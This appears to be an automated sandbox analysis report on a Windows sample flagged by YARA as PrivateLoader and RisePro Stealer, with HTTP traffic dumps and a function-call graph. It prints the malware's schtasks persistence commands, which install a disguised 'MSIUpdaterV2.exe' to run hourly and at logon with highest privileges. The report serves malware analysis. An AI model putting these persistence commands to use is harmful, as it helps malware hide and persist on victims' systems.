                                                                        2024-05-12 10:31:52 UTC  8359 bytes  IN  Data Raw: 32 30 39 66 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 69 6e 6c 69 6e 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 72 65 71 75 69 72 65 64 20 7b 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 66 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 68 65 61 64 65 72 2d 66 6f 6f 74 65 72 2d 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f
                                                                        Data Ascii: 209f<style id='woocommerce-inline-inline-css' type='text/css'>.woocommerce form .form-row .required { visibility: visible; }</style><link rel='stylesheet' id='hfe-style-css' href='https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/
                                                                        2024-05-12 10:31:52 UTC  12844 bytes  IN  Data Raw: 33 32 32 34 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 2d 31 38 30 78 31 38 30 2e 70 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e
                                                                        Data Ascii: 3224<link rel="icon" href="https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png" sizes="192x192" /><link rel="apple-touch-icon" href="https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-180x180.png" /><meta name="msapplication
                                                                        2024-05-12 10:31:52 UTC  16384 bytes  IN  Data Raw: 34 39 31 66 0d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 34 30 34 20 74 68 65 6d 65 2d 6e 65 77 68 6f 6d 65 20 71 69 2d 62 6c 6f 63 6b 73 2d 31 2e 32 20 71 6f 64 65 66 2d 67 75 74 65 6e 62 65 72 67 2d 2d 6e 6f 2d 74 6f 75 63 68 20 71 6f 64 65 2d 66 72 61 6d 65 77 6f 72 6b 2d 31 2e 32 2e 32 20 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 20 65 68 66 2d 68 65 61 64 65 72 20 65 68 66 2d 66 6f 6f 74 65 72 20 65 68 66 2d 74 65 6d 70 6c 61 74 65 2d 6e 65 77 68 6f 6d 65 20 65 68 66 2d 73 74 79 6c 65 73 68 65 65 74 2d 6e 65 77 68 6f 6d 65 20 71 6f 64 65 66 2d 71 69 2d 2d 6e 6f 2d 74 6f 75 63 68 20 71 69 2d 61 64 64 6f 6e 73 2d 66 6f 72 2d 65 6c 65 6d 65 6e 74 6f 72 2d 31 2e 36
                                                                        Data Ascii: 491f</style></head><body class="error404 theme-newhome qi-blocks-1.2 qodef-gutenberg--no-touch qode-framework-1.2.2 woocommerce-no-js ehf-header ehf-footer ehf-template-newhome ehf-stylesheet-newhome qodef-qi--no-touch qi-addons-for-elementor-1.6
                                                                        2024-05-12 10:31:52 UTC  2343 bytes  IN  Data Raw: 67 20 52 65 73 69 64 65 6e 74 69 61 6c 20 56 49 53 41 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 36 37 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 68 66 65 2d 63 72 65 61 74 69 76 65 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 6f 62 74 61 69 6e 69 6e 67 2d 6d 6f 72 74 67 61 67 65 2d 6c 6f 61 6e 73 2d 61 6e 64 2d 62 61 6e 6b 2d 66 69 6e 61 6e 63 69 6e 67 2f 22 20 63 6c 61 73 73 20 3d 20 22 68 66 65 2d 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 42 61 6e 6b 20 46 69 6e 61 6e 63 69 6e 67 3c 2f
                                                                        Data Ascii: g Residential VISA</a></li><li id="menu-item-3467" class="menu-item menu-item-type-post_type menu-item-object-page hfe-creative-menu"><a href="https://easy2buy.ae/obtaining-mortgage-loans-and-bank-financing/" class = "hfe-sub-menu-item">Bank Financing</
                                                                        2024-05-12 10:31:53 UTC  16384 bytes  IN  Data Raw: 63 33 65 34 0d 0a 09 09 3c 2f 68 65 61 64 65 72 3e 0a 0a 09 3c 6d 61 69 6e 20 69 64 3d 22 71 6f 64 65 66 2d 70 61 67 65 2d 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 09 3c 64 69 76 20 69 64 3d 22 71 6f 64 65 66 2d 34 30 34 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 70 61 67 65 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 74 69 74 6c 65 22 3e 4f 6f 70 73 2e 2e 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 68 32 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 74 65 78 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73
                                                                        Data Ascii: c3e4</header><main id="qodef-page-content" role="main"><div id="qodef-404-page"><div class="qodef-404-page-inner"><h2 class="qodef-404-title">Oops... Page Not Found!</h2><p class="qodef-404-text">The page you are looking for does not exis
                                                                        2024-05-12 10:31:53 UTC  16384 bytes  IN  Data Raw: 6f 78 22 20 64 61 74 61 2d 69 64 3d 22 39 34 65 36 63 64 62 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 69 63 6f 6e 2d 62 6f 78 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 63 75 73 74 6f 6d 2d 77 69 64 67 65 74 2d 69 63 6f 6e 2d 62 6f 78 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 36 38 37
                                                                        Data Ascii: ox" data-id="94e6cdb" data-element_type="widget" data-widget_type="icon-box.default"><div class="elementor-widget-container"><link rel="stylesheet" href="https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687



                                                                        Target ID:0
                                                                        Start time:12:30:51
                                                                        Start date:12/05/2024
                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                        Imagebase:0xaa0000
                                                                        File size:3'434'744 bytes
                                                                        MD5 hash:A594A9E1F8DB460345E86810D1C9A639
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:4
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
                                                                        Imagebase:0x140000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
                                                                        Imagebase:0x140000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:8.1%
                                                                          Signature Coverage:26.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:101
90242 ad8f03 90242->90241 90249 ad8fa3 7 API calls 2 library calls 90242->90249 90250 ae23f7 90244->90250 90247->90241 90248->90241 90249->90241 90252 ae2403 __fread_nolock 90250->90252 90251 ad8e60 90251->90239 90251->90241 90251->90242 90252->90251 90253 ae2446 90252->90253 90255 ae248c 90252->90255 90259 ad8be3 5 API calls __fread_nolock 90253->90259 90256 ae24b3 90255->90256 90257 ae251c __fread_nolock 7 API calls 90255->90257 90260 ae2514 GetLastError GetLastError GetProcAddress 90256->90260 90257->90256 90259->90251 90260->90251 90263 ae20c8 __fread_nolock 90261->90263 90262 ae20b7 90262->89966 90263->90262 90264 ae2112 __fread_nolock 90263->90264 90266 ae20db 90263->90266 90270 ae1ec6 90264->90270 90278 ad8c60 6 API calls __fread_nolock 90266->90278 90272 ae1ef5 90270->90272 90274 ae1ed8 __fread_nolock 90270->90274 90279 ae2151 6 API calls __fread_nolock 90272->90279 90273 ae1ee5 90305 ad8c60 6 API calls __fread_nolock 90273->90305 90274->90272 90274->90273 90276 aea1e9 __fread_nolock 6 API calls 90274->90276 90280 ae8910 90274->90280 90306 adceeb 6 API calls __fread_nolock 90274->90306 90276->90274 90278->90262 90279->90262 90281 ae8922 __dosmaperr 90280->90281 90282 ae893a 90280->90282 90281->90274 90282->90281 90283 ae8988 __dosmaperr 90282->90283 90284 ae89b8 90282->90284 90311 ad8c60 6 API calls __fread_nolock 90283->90311 90286 ae89d1 90284->90286 90288 ae8a0c std::_Locinfo::_Locinfo_dtor 90284->90288 90289 ae89de __dosmaperr 90284->90289 90287 ae89fa 90286->90287 90286->90289 90290 af3be3 __fread_nolock 6 API calls 90287->90290 90291 aeb01a ___std_exception_destroy GetLastError 90288->90291 90307 ad8c60 6 API calls __fread_nolock 90289->90307 90299 ae8b58 __fread_nolock 90290->90299 90292 ae8a26 90291->90292 90294 aeb01a ___std_exception_destroy GetLastError 90292->90294 90295 ae8a2d 90294->90295 90304 ae89f5 __fread_nolock __dosmaperr 90295->90304 90308 ae25fd 7 API calls __fread_nolock 90295->90308 90296 aeb01a ___std_exception_destroy GetLastError 
90296->90281 90298 ae8b88 90298->90274 90299->90298 90300 ae8c0d 90299->90300 90301 ae8c24 90299->90301 90299->90304 90309 ae8622 8 API calls 2 library calls 90300->90309 90301->90304 90310 ae8468 7 API calls __fread_nolock 90301->90310 90304->90296 90305->90272 90306->90274 90307->90304 90308->90287 90309->90304 90310->90304 90311->90281 90313 ac215f 90312->90313 90343 ae133b 90313->90343 90315 ac225f 90315->89971 90317 abdb56 90316->90317 90319 abde3d 90316->90319 90347 abebb0 GetLastError 90317->90347 90341 abdf4f std::ios_base::_Ios_base_dtor 90319->90341 90352 abeda0 7 API calls 2 library calls 90319->90352 90321 abdba4 90342 abdc86 std::ios_base::_Ios_base_dtor 90321->90342 90348 abeda0 7 API calls 2 library calls 90321->90348 90322 ab7ef0 GetLastError 90340 abdd01 std::ios_base::_Ios_base_dtor 90322->90340 90323 abdee2 90353 aa75c0 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90323->90353 90326 abdcec 90330 ab7ef0 GetLastError 90326->90330 90327 abdd82 90333 ab7ef0 GetLastError 90327->90333 90327->90340 90328 abdf06 90354 abf440 7 API calls 2 library calls 90328->90354 90329 abdc1c 90349 aa75c0 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90329->90349 90330->90340 90333->90340 90334 abdc40 90350 abf440 7 API calls 2 library calls 90334->90350 90336 abdf1f 90336->90340 90355 aa7a20 GetLastError ___std_exception_destroy 90336->90355 90338 abdc56 90338->90340 90351 aa7a20 GetLastError ___std_exception_destroy 90338->90351 90340->89973 90341->90322 90341->90340 90342->90326 90342->90327 90342->90340 90344 ae1346 90343->90344 90345 aea12d __Getctype 6 API calls 90344->90345 90346 ae1356 90345->90346 90346->90315 90347->90321 90348->90329 90349->90334 90350->90338 90351->90342 90352->90323 90353->90328 90354->90336 90355->90341 90356 b0aa00 90403 b0aa3a std::_Throw_Cpp_error 90356->90403 90357 b18aa7 90359 b0ab5e 90360 b1719c std::_Throw_Cpp_error 90359->90360 90361 b0ad04 std::_Throw_Cpp_error 90359->90361 90646 b4a180 
90359->90646 90365 b171f8 std::_Throw_Cpp_error 90360->90365 90362 b0ad61 std::_Throw_Cpp_error 90361->90362 90363 b4a180 43 API calls 90362->90363 90366 b0af28 std::_Throw_Cpp_error 90363->90366 90364 b4a180 43 API calls 90364->90365 90365->90364 90370 b1747d std::_Throw_Cpp_error 90365->90370 90367 b0af88 std::_Throw_Cpp_error 90366->90367 90369 b4a180 43 API calls 90367->90369 90368 b4a180 43 API calls 90368->90370 90371 b0b1a7 std::_Throw_Cpp_error 90369->90371 90370->90368 90375 b17702 std::_Throw_Cpp_error 90370->90375 90372 b0b207 std::_Throw_Cpp_error 90371->90372 90374 b4a180 43 API calls 90372->90374 90373 b4a180 43 API calls 90373->90375 90376 b0b3ce std::_Throw_Cpp_error 90374->90376 90375->90373 90380 b17987 std::_Throw_Cpp_error 90375->90380 90377 b0b42e std::_Throw_Cpp_error 90376->90377 90378 b4a180 43 API calls 90377->90378 90381 b0b5f5 std::_Throw_Cpp_error 90378->90381 90379 b4a180 43 API calls 90379->90380 90380->90379 90385 b17bb4 std::_Throw_Cpp_error 90380->90385 90382 b0b655 std::_Throw_Cpp_error 90381->90382 90384 b4a180 43 API calls 90382->90384 90383 b4a180 43 API calls 90383->90385 90386 b0b81c std::_Throw_Cpp_error 90384->90386 90385->90383 90390 b17de1 std::_Throw_Cpp_error 90385->90390 90387 b0b87c std::_Throw_Cpp_error 90386->90387 90388 b4a180 43 API calls 90387->90388 90391 b0ba43 std::_Throw_Cpp_error 90388->90391 90389 b4a180 43 API calls 90389->90390 90390->90389 90395 b1800e std::_Throw_Cpp_error 90390->90395 90392 b0baa3 std::_Throw_Cpp_error 90391->90392 90394 b4a180 43 API calls 90392->90394 90393 b4a180 43 API calls 90393->90395 90396 b0bc6a std::_Throw_Cpp_error 90394->90396 90395->90393 90400 b1823b std::_Throw_Cpp_error 90395->90400 90397 b0bcca std::_Throw_Cpp_error 90396->90397 90399 b4a180 43 API calls 90397->90399 90398 b4a180 43 API calls 90398->90400 90401 b0be91 std::_Throw_Cpp_error 90399->90401 90400->90398 90400->90403 90402 b0bef1 std::_Throw_Cpp_error 90401->90402 90404 b4a180 43 API calls 90402->90404 
90403->90357 90403->90359 90405 b4a180 43 API calls 90403->90405 90406 b0c0b8 std::_Throw_Cpp_error 90404->90406 90405->90403 90407 b0c118 std::_Throw_Cpp_error 90406->90407 90408 b4a180 43 API calls 90407->90408 90409 b0c2df std::_Throw_Cpp_error 90408->90409 90410 b0c33f std::_Throw_Cpp_error 90409->90410 90411 b4a180 43 API calls 90410->90411 90412 b0c506 std::_Throw_Cpp_error 90411->90412 90413 b0c566 std::_Throw_Cpp_error 90412->90413 90414 b4a180 43 API calls 90413->90414 90415 b0c72d std::_Throw_Cpp_error 90414->90415 90416 b0c78d std::_Throw_Cpp_error 90415->90416 90417 b4a180 43 API calls 90416->90417 90418 b0c954 std::_Throw_Cpp_error 90417->90418 90419 b0c9b4 std::_Throw_Cpp_error 90418->90419 90420 b4a180 43 API calls 90419->90420 90421 b0cb7b std::_Throw_Cpp_error 90420->90421 90422 b0cbdb std::_Throw_Cpp_error 90421->90422 90423 b4a180 43 API calls 90422->90423 90424 b0cda2 std::_Throw_Cpp_error 90423->90424 90425 b0ce02 std::_Throw_Cpp_error 90424->90425 90426 b4a180 43 API calls 90425->90426 90427 b0cfc9 std::_Throw_Cpp_error 90426->90427 90428 b0d029 std::_Throw_Cpp_error 90427->90428 90429 b4a180 43 API calls 90428->90429 90430 b0d1f0 std::_Throw_Cpp_error 90429->90430 90431 b0d250 std::_Throw_Cpp_error 90430->90431 90432 b4a180 43 API calls 90431->90432 90433 b0d46f std::_Throw_Cpp_error 90432->90433 90434 b0d4cf std::_Throw_Cpp_error 90433->90434 90435 b4a180 43 API calls 90434->90435 90436 b0d696 std::_Throw_Cpp_error 90435->90436 90437 b0d6f6 std::_Throw_Cpp_error 90436->90437 90438 b4a180 43 API calls 90437->90438 90439 b0d8bd std::_Throw_Cpp_error 90438->90439 90440 b0d91d std::_Throw_Cpp_error 90439->90440 90441 b4a180 43 API calls 90440->90441 90442 b0dae4 std::_Throw_Cpp_error 90441->90442 90443 b0db44 std::_Throw_Cpp_error 90442->90443 90444 b4a180 43 API calls 90443->90444 90445 b0dd0b std::_Throw_Cpp_error 90444->90445 90446 b0dd6b std::_Throw_Cpp_error 90445->90446 90447 b4a180 43 API calls 90446->90447 90448 b0df32 
std::_Throw_Cpp_error 90447->90448 90449 b0df92 std::_Throw_Cpp_error 90448->90449 90450 b4a180 43 API calls 90449->90450 90647 ad59b0 90646->90647 90648 b4a1db SHGetFolderPathA 90647->90648 90649 b4a20f std::_Throw_Cpp_error 90648->90649 90716 b4b343 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90649->90716 91002 b65f80 90649->91002 90651 b4a251 90652 b4a26b 90651->90652 90733 b4a2d5 std::_Throw_Cpp_error 90651->90733 90655 ab85d0 8 API calls 90652->90655 90653 b4b334 90656 ab85d0 8 API calls 90653->90656 90654 b4a277 90657 ab85d0 8 API calls 90654->90657 90655->90654 90656->90716 90661 b4a283 90657->90661 90658 b4da87 90659 ab7ef0 GetLastError 90658->90659 90660 b4dafa 90659->90660 90662 abaf80 GetLastError 90660->90662 90661->90359 90663 b4dbc2 90662->90663 90664 b4dbe0 SHGetFolderPathA 90663->90664 90665 b4dc1a std::_Throw_Cpp_error 90664->90665 90666 b65f80 GetLastError 90665->90666 90673 b4e0b3 90665->90673 90667 b4dc72 90666->90667 90668 b4dc94 90667->90668 90700 b4dcab std::_Throw_Cpp_error 90667->90700 90669 ab85d0 8 API calls 90668->90669 90672 b4dca6 90669->90672 90670 b4e09e 90671 ab85d0 8 API calls 90670->90671 90671->90673 90674 ab85d0 8 API calls 90672->90674 90675 b86cf0 16 API calls 90673->90675 90677 b5140f 90674->90677 90676 b4e276 90675->90676 90678 b86cf0 16 API calls 90676->90678 90679 b4e3e9 90676->90679 90677->90359 90678->90679 90680 b875c0 17 API calls 90679->90680 90682 b4e567 90680->90682 90681 b65f80 GetLastError 90681->90700 90684 abb430 7 API calls 90682->90684 90816 b4e91e std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 90682->90816 90683 aa7cf0 GetLastError 90688 b514d6 90683->90688 90685 b4e5f2 90684->90685 90686 abaf80 GetLastError 90685->90686 90687 b4e691 90686->90687 90689 abaf80 GetLastError 90687->90689 90687->90816 90691 ab7ef0 GetLastError 90688->90691 90692 b4e732 90689->90692 90690 ab85d0 8 API calls 90690->90700 90693 b5160a 90691->90693 90694 abaf80 GetLastError 90692->90694 90696 abaf80 
GetLastError 90693->90696 90695 b4e7c8 90694->90695 90697 abaf80 GetLastError 90695->90697 90695->90816 90702 b516e1 90696->90702 90698 b4e869 90697->90698 90699 abaf80 GetLastError 90698->90699 90701 b4e8ff 90699->90701 90700->90670 90700->90681 90700->90690 90807 b51024 std::_Throw_Cpp_error 90700->90807 91049 abb0e0 90701->91049 90705 b516ff SHGetFolderPathA 90702->90705 90704 b4e90d 91054 af8b00 6 API calls 90704->91054 90707 b51739 std::_Throw_Cpp_error 90705->90707 90708 b65f80 GetLastError 90707->90708 90778 b51aa0 std::ios_base::_Ios_base_dtor __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::_Facet_Register 90707->90778 90709 b51791 90708->90709 90710 b517b3 90709->90710 90727 b517ca std::_Throw_Cpp_error 90709->90727 90711 ab85d0 8 API calls 90710->90711 90712 b517c5 90711->90712 90715 ab85d0 8 API calls 90712->90715 90713 b51a8b 90714 ab85d0 8 API calls 90713->90714 90714->90778 90717 b533e9 90715->90717 90716->90654 90716->90658 90724 b86cf0 16 API calls 90716->90724 90717->90359 90718 b875c0 17 API calls 90718->90816 90719 b86cf0 16 API calls 90719->90816 90720 b65f80 GetLastError 90720->90727 90721 ab80a0 GetLastError 90721->90778 90722 ab85d0 8 API calls 90722->90727 90723 aa7cf0 GetLastError 90730 b534a9 std::_Throw_Cpp_error 90723->90730 90724->90716 90725 b53465 std::_Throw_Cpp_error 90726 aa7cf0 GetLastError 90725->90726 90726->90730 90727->90713 90727->90720 90727->90722 90754 b532cf std::_Throw_Cpp_error 90727->90754 90728 ac2100 6 API calls 90728->90816 90729 abdb10 7 API calls 90729->90816 90731 aa7cf0 GetLastError 90730->90731 90734 b5355e 90731->90734 90732 ab80a0 GetLastError 90732->90816 90733->90653 90733->90658 90739 b86cf0 16 API calls 90733->90739 90735 ab7ef0 GetLastError 90734->90735 90736 b535de 90735->90736 90738 abaf80 GetLastError 90736->90738 90737 b76710 14 API calls 90737->90778 90740 b536a6 90738->90740 90739->90733 90741 b536c4 SHGetFolderPathA 90740->90741 90744 b536fe std::_Throw_Cpp_error 90741->90744 90742 b76570 11 API 
calls 90742->90778 90746 b65f80 GetLastError 90744->90746 90757 b53c26 90744->90757 90745 ab7ef0 GetLastError 90745->90778 90748 b53756 90746->90748 90747 bead50 GetLastError GetLastError 90747->90778 90750 b53778 90748->90750 90785 b5378f std::_Throw_Cpp_error 90748->90785 90749 abaf80 GetLastError 90749->90816 90751 ab85d0 8 API calls 90750->90751 90774 b5378a 90751->90774 90752 b53c11 90753 ab85d0 8 API calls 90752->90753 90753->90757 90754->90723 90755 ab85d0 8 API calls 90761 b5830b 90755->90761 90756 abb0e0 GetLastError 90756->90816 90760 b86cf0 16 API calls 90757->90760 90759 b76710 14 API calls 90759->90816 90762 b53da6 90760->90762 90761->90359 90766 b86cf0 16 API calls 90762->90766 90767 b53f19 90762->90767 90763 b76570 11 API calls 90763->90816 90764 beb540 GetLastError GetLastError 90764->90816 90765 ac6db0 GetLastError 90765->90778 90766->90767 90768 b875c0 17 API calls 90767->90768 90773 b54097 90768->90773 90770 b65f80 GetLastError 90770->90785 90772 ae12f6 6 API calls 90772->90778 90775 abb430 7 API calls 90773->90775 90966 b54445 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::_Facet_Register 90773->90966 90774->90755 90776 b54119 90775->90776 90779 abaf80 GetLastError 90776->90779 90777 ab85d0 8 API calls 90777->90785 90778->90712 90778->90721 90778->90725 90778->90730 90778->90737 90778->90742 90778->90745 90778->90747 90778->90754 90778->90765 90778->90772 90805 beb540 GetLastError GetLastError 90778->90805 91080 beae80 GetLastError GetLastError 90778->91080 90780 b541b8 90779->90780 90781 abaf80 GetLastError 90780->90781 90780->90966 90783 b54259 90781->90783 90782 ab7ef0 GetLastError 90782->90816 90784 abaf80 GetLastError 90783->90784 90786 b542ef 90784->90786 90785->90752 90785->90770 90785->90777 90787 abaf80 GetLastError 90786->90787 90786->90966 90789 b54390 90787->90789 90788 b51492 std::_Throw_Cpp_error 90791 aa7cf0 GetLastError 90788->90791 90790 abaf80 GetLastError 90789->90790 90792 
